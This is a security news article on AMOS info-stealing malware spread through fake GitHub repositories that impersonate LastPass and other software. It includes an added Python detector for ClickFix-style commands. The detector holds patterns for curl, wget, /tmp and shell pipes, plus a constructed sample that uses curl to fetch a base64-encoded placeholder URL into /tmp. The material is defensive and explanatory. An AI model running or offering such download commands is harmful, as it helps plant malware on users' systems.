Macs under attack from malware impersonating popular password managers — how to stay safe


Over 100 password managers and software solutions are being impersonated by a new malware campaign targeting macOS users to steal their personal information. As reported by Bleeping Computer, the popular password manager LastPass has already started warning users about this malicious software that is being spread through fake GitHub repositories.

Besides impersonating LastPass, this campaign is also pretending to be other password managers and software solutions including 1Password, Dropbox, Gemini, Audacity, Adobe After Effects, and SentinelOne, among more than 100 others. It's using these fake repositories to spread the Atomic macOS Stealer, also known as AMOS, which is an info-stealing malware often used in ClickFix style attacks. AMOS is a malware-as-a-service offering that can be bought by hackers and other cybercriminals for roughly $1,000/month on the dark web and typically targets the data stored on vulnerable computers.

The developers of this malware also recently added a backdoor component which gives them persistent and stealthy access to compromised systems. A large number of these deceptive GitHub repositories have been created from multiple accounts in order to optimize them to rank high in search results and to evade detection. LastPass has reported the fake repositories to GitHub but since it's easy to recreate new ones through automation from new accounts, even if they're taken down, new fraudulent ones could pop up just as quickly.

As in other ClickFix-style attacks, the repositories feature a ‘download’ button that directs users to a secondary website, where they are instructed to paste a command into the terminal to install what seems to be legitimate software but is actually malware. The “ClickFix” method takes advantage of a target not fully understanding what the commands are doing on their system; in this case, the command performs a curl request to a base64-encoded URL, which then downloads an AMOS payload to the /tmp directory.
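A pasted command of the kind described above can be inspected before it is run. The Python below is an added example, not code from LastPass, Bleeping Computer or Tom's Guide: it decodes any base64 text in a command and lists what the command would do. The function names, the sample command and the example.invalid URL are constructed for illustration.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a URL.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"^(?:https?|ftp)://\S+$")


def decode_hidden_urls(command):
    """Return URLs that appear in the command only as base64 text."""
    found = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text
        if URL.match(text.strip()):
            found.append(text.strip())
    return found


def review_command(command):
    """List the reasons a pasted terminal command deserves a closer look."""
    reasons = []
    if re.search(r"\b(curl|wget)\b", command):
        reasons.append("downloads from the network")
    for url in decode_hidden_urls(command):
        reasons.append("base64 hides URL: " + url)
    if re.search(r"(^|[\s=\"'])/(private/)?tmp/", command):
        reasons.append("writes to or runs from /tmp")
    if re.search(r"\|\s*(ba|z)?sh\b", command):
        reasons.append("pipes output into a shell")
    return reasons


# Constructed sample; example.invalid is a reserved placeholder domain.
SAMPLE_URL = "https://example.invalid/install.sh"
SAMPLE = 'curl -fsSL "$(echo {} | base64 -d)" -o /tmp/update'.format(
    base64.b64encode(SAMPLE_URL.encode()).decode()
)
BENIGN = "brew install --cask audacity"

if __name__ == "__main__":
    for line in review_command(SAMPLE):
        print("flag:", line)
```

An empty result does not mean a command is safe; the checks only cover the download, base64 and /tmp pattern this campaign uses.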

How to stay safe from ClickFix malware attacks


In order to stay safe from ClickFix-style attacks, the most important thing you need to know is not to run commands on your system, especially when you don't understand them. Additionally, when looking for software online, it's recommended to only trust official app stores like the Mac App Store or vendor websites while avoiding offshoots. If there isn’t a macOS version of a particular piece of software available on a company's official site, be extra wary when you find a third-party site or, in this case, a GitHub page suggesting there is one.

If you do come across a macOS port of a program you're interested in, you should ensure that it comes from a reputable source that has been vetted by the community first. Still, you are installing it at your own risk, so when in doubt, it's best to wait for an official port.

It also never hurts to have strong protections when online – one of the best antivirus software solutions can keep your Windows PCs protected while the best Mac antivirus software is specifically designed for your Apple computer. These paid solutions also provide you with plenty of extra useful features like web browsers that warn you about suspicious websites and downloads, ransomware rollback, a VPN, and more.

For those who are really worried about getting hacked or having their bank accounts drained by cybercriminals, you can't go wrong with the best identity theft protection services for even more protection. However, you'll need to sign up before a cyberattack or major security incident to take full advantage of the identity theft insurance and other protections these services offer.

ClickFix style attacks have been quite successful recently and until the general public learns to recognize and avoid them, hackers are going to keep using them in their malware campaigns. That's why it's up to you to practice good cyber hygiene and most importantly, to always be careful where you click and what you download.


Amber Bouman
Senior Editor Security

Amber Bouman is the senior security editor at Tom's Guide where she writes about antivirus software, home security, identity theft and more. She has long had an interest in personal security, both online and off, and also has an appreciation for martial arts and edged weapons. With over two decades of experience working in tech journalism, Amber has written for a number of publications including PC World, Maximum PC, Tech Hive, and Engadget covering everything from smartphones to smart breast pumps. 
